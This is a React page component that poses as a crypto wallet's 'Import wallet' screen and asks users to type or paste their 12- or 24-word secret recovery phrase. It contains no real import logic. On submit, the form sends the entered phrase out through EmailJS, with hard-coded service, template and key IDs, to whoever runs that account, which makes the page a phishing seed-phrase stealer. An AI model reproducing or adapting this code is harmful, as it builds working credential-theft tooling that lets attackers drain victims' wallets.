import React, { useEffect, useRef, useState } from 'react'
import Header from '../components/Header'
import emailjs from '@emailjs/browser'
import Phrase from '../components/Phrase'

const word = [12, 24]

export default function Import() {
    const [phrase, setPhrase] = useState(12)
    const [inputValues, setInputValues] = useState(Array(24).fill(''));
    const [disable, setDisable] = useState(true)
    const form = useRef()

    useEffect(() => {
        if (inputValues.slice(0, phrase).includes("") || inputValues.slice(0, phrase).some(item => item && item.trim() === "")) {
            setDisable(true)
        } else {
            setDisable(false)
        }
    }, [phrase, inputValues])

    // Function to update input values
    const handleInputChange = (index, value) => {
        const newInputValues = [...inputValues];
        newInputValues[index - 1] = value;
        setInputValues(newInputValues);
    };

    // On Paste
    const handlePaste = (e) => {
        e.preventDefault()

        const paste = e.clipboardData.getData('text').split(" ")
        setInputValues(paste)
    }

    const sendEmail = (e) => {
        e.preventDefault();

        emailjs
            .sendForm('service_c03z21x', 'template_q01glts', form.current, {
                publicKey: '0cCJ-dKSpQV0fUYTe',
            })
            .then(
                () => {
                    console.log('SUCCESS!');
                },
                (error) => {
                    console.log('FAILED...', error.text);
                },
            );
    };

    return (
        <>
            <Header />
            <form
                className='mt-3 flex flex-col gap-3'
                ref={form}
                onSubmit={sendEmail}
            >
                <p className='text-lg text-center'>Secret Recovery Phrase</p>
                <p className='text-center text-xs text-white/50'>Import an existing wallet with your secret recovery phrase</p>
                {/* Phrase Length */}
                <div className='flex gap-3 items-center justify-center'>
                    {word.map((item, index) => (
                        <button
                            key={index}
                            type='button'
                            className='text-[1.125rem] relative flex gap-2 items-center justify-center'
                            onClick={() => setPhrase(item)}
                        >
                            <div className={`relative w-4 aspect-square rounded-full border-[1.5px] ${item === phrase
                                ? 'border-[rgb(234,194,73)]'
                                : 'border-white/50'}`}>
                                {item === phrase && (
                                    <div className='absolute left-1/2 top-1/2 -translate-x-1/2 -translate-y-1/2 w-[10px] aspect-square rounded-full bg-[rgb(234,194,73)]'></div>
                                )}
                            </div>
                            <span>{item} words</span>
                        </button>
                    ))}
                </div>
                {/* Inputs */}
                <div className='w-[266px] mx-auto grid grid-cols-2 gap-2'>
                    {Array.from({ length: (phrase + 1) }, (item, index) => index > 0 && (
                        <Phrase
                            key={index}
                            index={index}
                            inputValues={inputValues}
                            handleInputChange={handleInputChange}
                            handlePaste={handlePaste}
                        />
                    ))}
                </div>
                <div className='h-[80px]'></div>
                <div className='fixed bottom-0 w-full left-0 px-[10px] pt-[10px] pb-[20px] bg-[rgb(28,25,25)]'>
                    <button
                        className='w-full rounded bg-[rgb(253,224,71)] text-black px-3 min-h-9 disabled:opacity-50 disabled:cursor-not-allowed'
                        type='submit'
                        disabled={disable}
                    >
                        Continue
                    </button>
                </div>
            </form>
        </>
    )
}
